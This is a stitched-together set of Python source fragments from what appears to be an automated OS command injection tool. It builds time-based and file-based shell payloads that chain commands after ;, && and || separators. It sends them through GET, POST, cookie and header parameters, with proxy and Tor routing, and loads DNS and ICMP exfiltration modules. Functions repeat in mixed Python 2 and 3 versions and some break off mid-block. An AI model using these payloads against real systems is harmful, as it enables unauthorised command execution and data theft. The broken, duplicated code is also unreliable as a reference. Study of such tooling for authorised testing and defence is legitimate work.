if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
# Check if file-based semiblind command injection technique succeeds.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
elif menu.options.tech == "file-based":
fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
file_based_state = False
if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False:
info_msg = (
"(x) Critical: The tested ("
+ http_request_method
+ ")"
+ check_parameter
+ " parameter appear to be not injectable."
)
if not menu.options.alter_shell:
info_msg += " Use the option '--alter-shell'"
else:
info_msg += " Remove the option '--alter-shell'"
info_msg += " and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc)."
print Back.RED + info_msg + Style.RESET_ALL
# else:
# print ""
sys.exit(0)
def exploitation(url,delay,filename,tmp_path,http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded= False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Print the findings to log file.
output_file = open(filename + ".txt", "a")
output_file.write("\n---")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print colors.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + colors.RESET
sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
sys.stdout.flush()
for seperator in settings.SEPERATORS:
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# Check if defined "--base64" option.
if menu.options.base64_trick == True:
B64_ENC_TAG = base64.b64encode(TAG)
B64_DEC_TRICK = settings.B64_DEC_TRICK
else:
B64_ENC_TAG = TAG
B64_DEC_TRICK = ""
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + B64_ENC_TAG + ".txt"
tag_length = len(TAG) + 4
for j in range(1,int(tag_length)):
try:
if not menu.options.alter_shell:
if seperator == ";" :
payload = (seperator + " "
"str=$(echo " + TAG + " > " + OUTPUT_TEXTFILE + ")" + seperator + " "
"str=$(cat " + OUTPUT_TEXTFILE + ")" + seperator + " "
# Find the length of the output.
"str1=${#str}" + seperator + " "
"if [ \"" + str(j) + "\" -ne ${str1} ]" + seperator + " "
"then sleep 0" + seperator + " "
"else sleep " + str(delay) + seperator + " "
"fi "
)
elif seperator == "&&" :
if http_request_method == "POST":
seperator = urllib.quote(seperator)
ampersand = "%26"
else:
ampersand = "&"
payload = (ampersand + " " +
"sleep 0 " + seperator + " "
"str=$(echo "+ TAG + " > '" + OUTPUT_TEXTFILE + "') " + seperator + " "
"str=$(cat " + OUTPUT_TEXTFILE + ") " + seperator + " "
"str1=${#str} " + seperator + " "
"[ " + str(j) + " -eq ${str1} ] " + seperator + " "
"sleep " + str(delay)
)
if http_request_method == "POST":
seperator = urllib.unquote(seperator)
elif seperator == "||" :
payload = (seperator + " "
"echo '" + TAG + "' > " + OUTPUT_TEXTFILE + " | "+
"[ " + str(j) + " -ne $(cat \""+OUTPUT_TEXTFILE+"\" | wc -c) ] " + seperator + " "
"sleep " + str(delay)
)
else:
break
#-----------------------------------------------------------------------------------------
# __Warning__: This (alternative) python-shell is still experimental.
#-----------------------------------------------------------------------------------------
else:
if seperator == ";" :
payload = (seperator + " "
"str=$(echo " + TAG + " > " + OUTPUT_TEXTFILE + ")" + seperator + " "
# Find the length of the output, using readline().
"str1=$(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\")"+ seperator + " "
"if [ \"" + str(j) + "\" -ne ${str1} ]" + seperator + " "
"then $(python -c \"import time;time.sleep(0)\")"+ seperator + " "
"else $(python -c \"import time;time.sleep("+ str(delay) +")\")"+ seperator + " "
"fi "
)
elif seperator == "&&" :
if http_request_method == "POST":
seperator = urllib.quote(seperator)
ampersand = urllib.quote("&")
else:
ampersand = "&"
payload = (ampersand + " " +
"$(python -c \"import time;time.sleep(0)\") " + seperator + " "
"str=$(echo "+ TAG + " > " + OUTPUT_TEXTFILE + ") " + seperator + " "
# Find the length of the output, using readline().
"str1=$(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + seperator + " "
"[ " + str(j) + " -eq ${str1} ] " + seperator + " "
"$(python -c \"import time;time.sleep("+ str(delay) +")\") "
)
if http_request_method == "POST":
seperator = urllib.unquote(seperator)
elif seperator == "||" :
payload = (seperator + " "
"echo '" + TAG + "' > " + OUTPUT_TEXTFILE + " | "+
# Find the length of the output, using readline().
"[ " + str(j) + " -ne $(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") ] " + seperator + " "
"$(python -c \"import time;time.sleep(0)\") | $(python -c \"import time;time.sleep("+ str(delay) +")\")"
)
else:
break
#-----------------------------------------------------------------------------------------
# Check if defined "--verbose" option.
if menu.options.verbose:
if seperator == ";" or seperator == "&&" or seperator == "||":
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
raise SystemExit()
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except urllib2.HTTPError, err:
print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
def do_check(url, filename):
classic_state = False
eval_based_state = False
time_based_state = False
file_based_state = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Check if authentication is needed.
if menu.options.auth_url and menu.options.auth_data:
# Do the authentication process.
authentication.authentication_process()
# Check if authentication page is the same with the next (injection) URL
if urllib2.urlopen(url).read() == urllib2.urlopen(
menu.options.auth_url).read():
print Back.RED + "(x) Error: It seems that the authentication procedure has failed." + Style.RESET_ALL
sys.exit(0)
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + "(x) Error: You must specify both login panel URL and login parameters." + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is GET or POST.
header_name = ""
if not menu.options.data:
http_request_method = "GET"
if not settings.COOKIE_INJECTION \
and not settings.USER_AGENT_INJECTION \
and not settings.REFERER_INJECTION:
url = parameters.do_GET_check(url)
check_parameter = parameters.vuln_GET_param(url)
the_type = " parameter "
else:
http_request_method = "POST"
parameter = menu.options.data
parameter = parameters.do_POST_check(parameter)
check_parameter = parameters.vuln_POST_param(parameter, url)
the_type = " parameter "
# Load modules
modules_handler.load_modules(url, http_request_method, filename)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
check_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
the_type = " HTTP header "
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
check_parameter = ""
the_type = " HTTP header "
# Referer Injection
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
check_parameter = ""
the_type = " HTTP header "
else:
pass
if len(check_parameter) != 0:
check_parameter = " '" + check_parameter + "'"
print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(
url, http_request_method, delay)
# Check all injection techniques
if not menu.options.tech:
# Check if it is vulnerable to classic command injection technique.
if cb_handler.exploitation(url, delay, filename,
http_request_method) != False:
classic_state = True
# Check if it is vulnerable to eval-based command injection technique.
if eb_handler.exploitation(url, delay, filename,
http_request_method) != False:
eval_based_state = True
# Check if it is vulnerable to time-based blind command injection technique.
if tb_handler.exploitation(url, delay, filename, http_request_method,
url_time_response) != False:
time_based_state = True
# Check if it is vulnerable to file-based semiblind command injection technique.
if fb_handler.exploitation(url, delay, filename, http_request_method,
url_time_response) != False:
file_based_state = True
else:
# Check if it is vulnerable to classic command injection technique.
if "classic" in menu.options.tech or len(
menu.options.tech) <= 4 and "c" in menu.options.tech:
# Check if classic results-based command injection technique succeeds.
if cb_handler.exploitation(url, delay, filename,
http_request_method) != False:
classic_state = True
elif menu.options.tech == "classic":
cb_handler.exploitation(url, delay, filename, http_request_method)
else:
classic_state = False
# Check if it is vulnerable to eval-based command injection technique.
if "eval-based" in menu.options.tech or len(
menu.options.tech) <= 4 and "e" in menu.options.tech:
# Check if eval-based command injection technique succeeds.
if eb_handler.exploitation(url, delay, filename,
http_request_method) != False:
eval_based_state = True
elif menu.options.tech == "eval-based":
eb_handler.exploitation(url, delay, filename, http_request_method)
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if "time-based" in menu.options.tech or len(
menu.options.tech) <= 4 and "t" in menu.options.tech:
# Check if time-based blind command injection technique succeeds.
if tb_handler.exploitation(url, delay, filename,
http_request_method,
url_time_response) != False:
time_based_state = True
elif menu.options.tech == "time-based":
tb_handler.exploitation(url, delay, filename, http_request_method,
url_time_response)
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
if "file-based" in menu.options.tech or len(
menu.options.tech) <= 4 and "f" in menu.options.tech:
# Check if file-based semiblind command injection technique succeeds.
if fb_handler.exploitation(url, delay, filename,
http_request_method,
url_time_response) != False:
file_based_state = True
elif menu.options.tech == "file-based":
fb_handler.exploitation(url, delay, filename, http_request_method,
url_time_response)
else:
file_based_state = False
if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False:
info_msg = "(x) Critical: The tested (" + http_request_method + ")" + check_parameter + " parameter appear to be not injectable."
if not menu.options.alter_shell:
info_msg += " Use the option '--alter-shell'"
else:
info_msg += " Remove the option '--alter-shell'"
info_msg += " and/or try to audit the HTTP headers (i.e 'User-Agent', 'Referer', 'Cookie' etc)."
print Back.RED + info_msg + Style.RESET_ALL
# else:
# print ""
sys.exit(0)
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding spaces.
payload = payload.replace(" ", "%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = url.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(target)
# Check if defined extra headers.
headers.do_check(request)
try:
# Get the response of the request
response = requests.get_request_response(request)
except KeyboardInterrupt:
response = None
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = ''.join(str(e) for e in parameter).replace("+", "%2B")
# Define the POST data
if settings.IS_JSON:
data = parameter.replace(
settings.INJECT_TAG,
_urllib.parse.unquote(payload.replace("\"", "\\\"")))
try:
data = checks.json_data(data)
except ValueError:
pass
elif settings.IS_XML:
data = parameter.replace(settings.INJECT_TAG,
_urllib.parse.unquote(payload))
else:
data = parameter.replace(settings.INJECT_TAG, payload)
request = _urllib.request.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
try:
# Get the response of the request
response = requests.get_request_response(request)
except KeyboardInterrupt:
response = None
return response, vuln_parameter
def do_check(url, filename):
check_http_headers = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Check if authentication is needed.
if menu.options.auth_url and menu.options.auth_data:
# Do the authentication process.
authentication.authentication_process()
# Check if authentication page is the same with the next (injection) URL
if urllib2.urlopen(url).read() == urllib2.urlopen(
menu.options.auth_url).read():
print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
sys.exit(0)
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is GET.
if not menu.options.data:
# Enable Cookie Injection
if menu.options.cookie and menu.options.level > 1:
settings.COOKIE_INJECTION = True
http_request_method = "GET"
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2:
check_parameter = ""
stored_http_header_injection(url, check_parameter,
check_http_headers,
http_request_method, filename, delay)
# Enable Cookie Injection
if menu.options.cookie:
settings.COOKIE_INJECTION = True
if not settings.COOKIE_INJECTION:
found_url = parameters.do_GET_check(url)
if found_url != False:
for i in range(0, len(found_url)):
url = found_url[i]
check_parameter = parameters.vuln_GET_param(url)
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
if check_for_stored_sessions(
url, http_request_method):
injection_proccess(url, check_parameter,
http_request_method,
filename, delay)
else:
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter,
http_request_method, filename,
delay)
if not settings.LOAD_SESSION:
for i in range(0, len(found_url)):
url = found_url[i]
check_parameter = parameters.vuln_GET_param(url)
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
injection_proccess(url, check_parameter,
http_request_method,
filename, delay)
else:
injection_proccess(url, check_parameter,
http_request_method, filename,
delay)
# Check if HTTP Method is POST.
else:
http_request_method = "POST"
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2:
check_parameter = ""
stored_http_header_injection(url, check_parameter,
check_http_headers,
http_request_method, filename, delay)
# Check if HTTP Method is POST.
parameter = menu.options.data
found_parameter = parameters.do_POST_check(parameter)
# Remove whitespaces
# Check if singe entry parameter
if type(found_parameter) is str:
found_parameter_list = []
found_parameter_list.append(found_parameter)
found_parameter = found_parameter_list
# Remove whitespaces
found_parameter = [x.replace(" ", "") for x in found_parameter]
# Check if multiple parameters
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter,
http_request_method, filename,
delay)
else:
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter,
http_request_method, filename, delay)
if not settings.LOAD_SESSION:
for i in range(0, len(found_parameter)):
parameter = menu.options.data = found_parameter[i]
check_parameter = parameters.vuln_POST_param(parameter, url)
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
injection_proccess(url, check_parameter,
http_request_method, filename,
delay)
else:
injection_proccess(url, check_parameter,
http_request_method, filename, delay)
# Enable Cookie Injection
if menu.options.cookie and menu.options.level > 1:
settings.COOKIE_INJECTION = True
# Cookie Injection
if settings.COOKIE_INJECTION == True:
cookie_value = menu.options.cookie
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2:
check_parameter = ""
stored_http_header_injection(url, check_parameter,
check_http_headers,
http_request_method, filename, delay)
header_name = " Cookie"
settings.HTTP_HEADER = header_name[1:].lower()
cookie_parameters = parameters.do_cookie_check(menu.options.cookie)
if type(cookie_parameters) is str:
cookie_parameters_list = []
cookie_parameters_list.append(cookie_parameters)
cookie_parameters = cookie_parameters_list
# Remove whitespaces
cookie_parameters = [x.replace(" ", "") for x in cookie_parameters]
for i in range(0, len(cookie_parameters)):
menu.options.cookie = cookie_parameters[i]
check_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
# Check for session file
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter,
http_request_method, filename,
delay)
else:
if check_for_stored_sessions(url, http_request_method):
injection_proccess(url, check_parameter,
http_request_method, filename, delay)
if not settings.LOAD_SESSION:
for i in range(0, len(cookie_parameters)):
menu.options.cookie = cookie_parameters[i]
check_parameter = parameters.specify_cookie_parameter(
menu.options.cookie)
if len(check_parameter) > 0:
settings.TESTABLE_PARAMETER = check_parameter
# Check if testable parameter(s) are provided
if len(settings.TEST_PARAMETER) > 0:
if check_parameter in settings.TEST_PARAMETER:
injection_proccess(url, check_parameter,
http_request_method, filename,
delay)
else:
injection_proccess(url, check_parameter,
http_request_method, filename, delay)
if settings.COOKIE_INJECTION == True:
# Restore cookie value
menu.options.cookie = cookie_value
# Disable cookie injection
settings.COOKIE_INJECTION = False
# Custom header Injection
if settings.CUSTOM_HEADER_INJECTION == True:
check_parameter = header_name = " " + settings.CUSTOM_HEADER_NAME
settings.HTTP_HEADER = header_name[1:].lower()
check_for_stored_sessions(url, http_request_method)
injection_proccess(url, check_parameter, http_request_method, filename,
delay)
# Check for stored injections on User-agent / Referer headers (if level > 2).
if menu.options.level > 2:
check_parameter = ""
check_http_headers = True
stored_http_header_injection(url, check_parameter, check_http_headers,
http_request_method, filename, delay)
# All injection techniques seems to be failed!
if settings.CLASSIC_STATE == settings.EVAL_BASED_STATE == settings.TIME_BASED_STATE == settings.FILE_BASED_STATE == False:
info_msg = settings.CRITICAL_SIGN + "All the tested (" + http_request_method + ") parameters appear to be not injectable."
if not menu.options.alter_shell:
info_msg += " Try to use the option '--alter-shell'"
else:
info_msg += " Try to remove the option '--alter-shell'"
if menu.options.level < 3:
info_msg += " and/or try to increase '--level' values to perform more tests (i.e 'User-Agent', 'Referer', 'Cookie' etc)"
info_msg += "."
print Back.RED + info_msg + Style.RESET_ALL
sys.exit(0)
#eof
def injection_test(payload, http_request_method, url):
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
#url = parameters.do_GET_check(url)
# Encoding spaces.
payload = payload.replace(" ", "%20")
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
try:
# Get the response of the request
response = requests.get_request_response(request)
except KeyboardInterrupt:
response = None
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
parameter = parameter.replace("+", "%2B")
# Define the POST data
if settings.IS_JSON == False:
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
else:
payload = payload.replace("\"", "\\\"")
data = re.sub(settings.INJECT_TAG, urllib.unquote(payload),
parameter)
try:
data = json.loads(data, strict=False)
except:
pass
request = urllib2.Request(url, json.dumps(data))
# Check if defined extra headers.
headers.do_check(request)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter, url)
try:
# Get the response of the request
response = requests.get_request_response(request)
except KeyboardInterrupt:
response = None
return response, vuln_parameter
def exploitation(url,delay,filename,http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded= False
injection_type = "Blind-based Command Injection"
technique = "time-based injection technique"
# Print the findings to log file.
output_file = open(filename + ".txt", "a")
output_file.write("\n---")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print colors.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + colors.RESET
sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
sys.stdout.flush()
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for seperator in settings.SEPERATORS:
# Check for bad combination of prefix and seperator
combination = prefix + seperator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
tag_length = len(TAG) + 4
for j in range(1,int(tag_length)):
try:
if seperator == ";" :
payload = (seperator + " "
"str=$(echo "+TAG+")" + seperator + " "
# Find the length of the output.
"str1=${#str}" + seperator + " "
"if [ \"" + str(j) + "\" -ne ${str1} ]" + seperator + " "
"then sleep 0" + seperator + " "
"else sleep " + str(delay) + seperator + " "
"fi "
)
elif seperator == "&&" :
if http_request_method == "POST":
seperator = urllib.quote(seperator)
ampersand = urllib.quote("&")
else:
ampersand = "&"
payload = (ampersand + " " +
"sleep 0 " + seperator + " "
"str=$(echo "+TAG+") " + seperator + " "
# Find the length of the output.
"str1=${#str} " + seperator + " "
"[ " + str(j) + " -eq ${str1} ] " + seperator + " "
"sleep 1 "
)
if http_request_method == "POST":
seperator = urllib.unquote(seperator)
elif seperator == "||" :
payload = (seperator + " "
"echo '" + TAG + "' | "+
"[ "+str(j)+" -ne $(echo \""+TAG+"\" | wc -c) ] " + seperator + " "
"sleep " + str(delay) + " "
)
else:
break
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
# Check if defined "--verbose" option.
if menu.options.verbose:
if seperator == ";" or seperator == "&&" or seperator == "||":
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
start = 0
end = 0
start = time.time()
# Check if defined method is GET (Default).
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Encoding non-ASCII characters payload.
payload = urllib.quote(payload)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
target = re.sub(settings.INJECT_TAG, payload, url)
request = urllib2.Request(target)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
# Check if defined method is POST.
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
# Define the POST data
data = re.sub(settings.INJECT_TAG, payload, parameter)
request = urllib2.Request(url, data)
# Check if defined extra headers.
headers.do_check(request)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
response = urllib2.urlopen(request)
response.read()
except urllib2.HTTPError, err:
print "\n(x) Error : " + str(err)
sys.exit(1)
else:
response = urllib2.urlopen(request)
response.read()
end = time.time()
how_long = int(end - start)
except:
def dns_exfiltration_handler(url, http_request_method):
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# You need to have root privileges to run this script
if os.geteuid() != 0:
err_msg = "You need to have root privileges to run this option."
print("\n" + settings.print_critical_msg(err_msg))
os._exit(0)
if http_request_method == "GET":
#url = parameters.do_GET_check(url)
vuln_parameter = parameters.vuln_GET_param(url)
request = _urllib.request.Request(url)
headers.do_check(request)
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
parameter = parameters.do_POST_check(parameter)
request = _urllib.request.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n") + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n") + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
else:
try:
response = _urllib.request.urlopen(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n") + settings.print_critical_msg(err)
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
if settings.TARGET_OS == "win":
err_msg = "This module's payloads are not suppoted by "
err_msg += "the identified target operating system."
print(settings.print_critical_msg(err_msg) + "\n")
os._exit(0)
else:
dns_server = menu.options.dns_server
technique = "DNS exfiltration module"
info_msg = "Loading the " + technique + ". \n"
sys.stdout.write(settings.print_info_msg(info_msg))
exploitation(dns_server, url, http_request_method, vuln_parameter,
technique)
def icmp_exfiltration_handler(url, http_request_method):
# Check injection state
settings.DETECTION_PHASE = True
settings.EXPLOITATION_PHASE = False
# You need to have root privileges to run this script
if os.geteuid() != 0:
err_msg = "You need to have root privileges to run this option."
print(settings.print_critical_msg(err_msg) + "\n")
os._exit(0)
if not menu.options.data:
#url = parameters.do_GET_check(url, http_request_method)
request = _urllib.request.Request(url)
headers.do_check(request)
vuln_parameter = parameters.vuln_GET_param(url)
else:
parameter = menu.options.data
parameter = _urllib.parse.unquote(parameter)
parameter = parameters.do_POST_check(parameter, http_request_method)
request = _urllib.request.Request(url, parameter)
headers.do_check(request)
vuln_parameter = parameters.vuln_POST_param(parameter, url)
# Check if defined any HTTP Proxy.
if menu.options.proxy:
try:
response = proxy.use_proxy(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
err_msg.code) == settings.BAD_REQUEST:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n" + settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
# Check if defined Tor.
elif menu.options.tor:
try:
response = tor.use_tor(request)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
err_msg.code) == settings.BAD_REQUEST:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n" + settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
else:
try:
response = _urllib.request.urlopen(request,
timeout=settings.TIMEOUT)
except _urllib.error.HTTPError as err_msg:
if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR or str(
err_msg.code) == settings.BAD_REQUEST:
response = False
elif settings.IGNORE_ERR_MSG == False:
err = str(err_msg) + "."
print("\n" + settings.print_critical_msg(err))
continue_tests = checks.continue_tests(err_msg)
if continue_tests == True:
settings.IGNORE_ERR_MSG = True
else:
os._exit(0)
if settings.TARGET_OS == "win":
err_msg = "This module's payloads are not suppoted by "
err_msg += "the identified target operating system."
print(settings.print_critical_msg(err_msg) + "\n")
os._exit(0)
else:
technique = "ICMP exfiltration module"
info_msg = "Loading the " + technique + ". \n"
sys.stdout.write(settings.print_info_msg(info_msg))
sys.stdout.flush()
ip_data = menu.options.ip_icmp_data
# Source IP address
ip_src = re.findall(r"ip_src=(.*),", ip_data)
ip_src = ''.join(ip_src)
# Destination IP address
ip_dst = re.findall(r"ip_dst=(.*)", ip_data)
ip_dst = ''.join(ip_dst)
